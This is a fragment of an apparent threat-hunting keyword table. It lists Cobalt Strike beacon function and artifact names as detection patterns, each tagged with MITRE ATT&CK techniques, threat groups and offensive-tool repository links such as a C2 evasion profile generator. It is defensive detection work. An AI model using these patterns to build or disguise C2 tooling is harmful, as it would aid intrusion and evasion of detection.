T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_remote_exec_method_describe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A 
-*beacon_remote_exec_method_register*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exec_methods*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 
- T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exploit*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_remote_exploit_arch*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exploit_describe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exploit_register*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_remote_exploits*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_smb.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Beacon_Stage_p2_Stuct*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*beacon_stage_pipe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_stage_pipe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Beacon_Stage_Struct_p1*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*Beacon_Stage_Struct_p3*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*beacon_stage_tcp*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_stage_tcp*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 
- T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_test.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_top *,offensive_tool_keyword,cobaltstrike,Adversary 
Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_top_callback*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*BeaconApi.cs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*beacon-c2-go*,offensive_tool_keyword,cobaltstrike,backdoor c2,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
